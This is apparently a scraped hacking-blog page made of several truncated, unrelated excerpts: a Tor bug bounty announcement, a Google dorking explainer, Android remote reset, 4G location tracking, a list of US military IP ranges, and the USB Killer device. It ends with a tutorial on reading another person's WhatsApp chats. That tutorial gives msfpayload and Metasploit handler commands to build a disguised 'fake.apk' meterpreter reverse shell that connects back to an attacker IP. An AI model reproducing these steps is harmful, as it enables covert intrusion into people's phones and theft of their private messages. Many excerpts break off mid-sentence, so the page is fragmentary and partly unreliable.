Computer Information Technology

The non-profit organization behind TOR – the largest online anonymity network that allows people to hide their real identity online – will soon be launching a "Bug Bounty Program" for researchers who find loopholes in Tor apps. The bounty program was announced during the recurring 'State of the Onion' talk by Tor Project at Chaos Communication Congress held in Hamburg, Germany. Bug bounty programs are cash rewards gave by companies or organizations to white hat hackers and researchers who hunt for serious security vulnerabilities in their website or products and then responsibly disclose them. Bug bounties are designed to encourage security researchers and hackers to responsibly report the vulnerabilities they discovered, rather than exploiting it. The bug bounty program will start in the new year . The Tor Project is following in the footsteps of a number of major technology companies, such as Facebook, Google, Paypal, and Mozilla, which offer bug bounti

Google Dork is an employee who unknowingly exposes sensitive corporate information on the Internet. Google dork queries are built with the advanced search operators that IT administrators, researchers and other professionals use in their daily work to narrow down search engine results. Because search operators can be strung together, an attacker can use complex queries to find information that was published on the Internet but was not meant to be found. The use of advanced search operators to find information that is not easily accessed through simple searches is sometimes called Google dorking or Google hacking. Google hacking is a computer hacking technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites use. Google hacking involves using advanced operators in the Google search engine to locate specific strings of text within search results. Some of the more popular examples are finding specific

Older versions of Android can be remotely reset by Google if the company is issued with a court order, but only if they're locked using a pattern. This is according to a document prepared by the New York District Attorney's Office which revealed just how easily investigators could see the contents of a device. Devices running Android 5.0 and newer cannot be remotely reset as they use full disk encryption. However, this option is not switched on by default. The report found any device using an older version of the operating system is vulnerable to remote reset and according to the Android Developer Dashboard, this is 74.1 per cent of Android devices currently being used. However, this figure is slightly misleading. The remote reset feature does apply to phones running operating systems before Android L, but it only applies to people how have secured their device with a pattern. Google can't remotely reset phones secured with a PIN or passcode, meaning the numbe

Hackers can monitor 4G mobile networks to detect users' location using supposedly anonymised identifiers Security researchers have revealed how simply contacting somebody via WhatsApp or Facebook messenger can reveal a smartphone owner's location by exploiting a security flaw in 4G mobile networks. A hacker could use the apps to discover the supposedly anonymised identifiers that are assigned to devices when they connect to a network, and use them to locate their owner, according to researchers in Finland and Germany. When a smartphone connects to a mobile network, it is assigned a temporary number called a TMSI (Temporary Mobile Subscriber Identity). The network then uses this eight-digit number to identify a device, rather than a phone number, to make communication more private. However, a hacker monitoring radio communications could tie this TMSI to an individual by sending them a Facebook message or WhatsApp chat, both of which trigger a special "paging reques

Do Not Scan These IP Addresses ( Unless you want to get into trouble ) The IP addresses listed in the below images are associated with critical information resource centers of US. Scanning these IP addresses will be considered an attempt to break the US's Information Security. Therefore do not scan these IP addresses unless you want to get into trouble. Credits to Hacking-Tutorial.com for the list. RANGE 6 6.* – Army Information Systems Center RANGE 7 7.*.*.* Defense Information Systems Agency, VA RANGE 11 11.*.*.* DoD Intel Information Systems, Defense Intelligence Agency, Washington DC RANGE 21 21. – US Defense Information Systems Agency RANGE 22 22.* – Defense Information Systems Agency RANGE 24 24.198.*.* RANGE 25 25.*.*.* Royal Signals and Radar Establishment, UK RANGE 26 26.* – Defense Information Systems Agency RANGE 29 29.* – Defense Information Systems Agency RANGE 30 30.* – Defense Information Systems Agency RANGE 49 49.* – Joint Ta

The Russian cybersecurity expert, Dark Purple , who created the devious USB Killer pen drive, has created a new version of the malicious hardware that can brick a device as soon as it is plugged in. In a new blog post (link in Russian), the somewhat anonymous Dark Purple described his device, simply titled USB Killer v2.0. It doesn’t install any malware on your computer once you plug it in. Instead it sends a 220-volt charge through the USB’s signal lines and destroys the computer. The original USB Killer, first revealed online back in March, administered 110 volts, which was more than enough to fry your computer anyway. USB Killer looks quite inconspicuous, too, and could be easily mistaken for an average USB drive. Dark Purple posted a short video demonstrating the USB in action, where he destroys the motherboard of a Lenovo Thinkpad X60 laptop, which he bought specifically for the test, in just a couple of seconds. As viewers can see, the USB stick looks normal, and there

Are you curious about how to get somebody's whatsapp chat list. Just follow Credits To -> How To Decrypt Whatsapp Database. Before starting the database decryption process,first obtain remote access to android device: 1. Start terminal and type: msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=81 R > fake.apk [ Lhost=Attacker IP address, Lport=local port ] This command will generate fake.apk in home directory. 2. Type: msfconsole This command will start the metasploit framework. 3. Type: use exploit/multi/handler In order to get multiple session on a single multi/handler. 4. Type: set payload android/meterpreter/reverse_tcp This will provide the reverse connection from victim to attacker computer. 5. Type: show options It will show the available options like lhost,lport 6. Set LHOST=192.168.0.2 7. Set LPORT=81 8. EXPLOIT Now Run the app created in step 1 on your android phone and you'll get a meterpreter session After getting the meterpreter session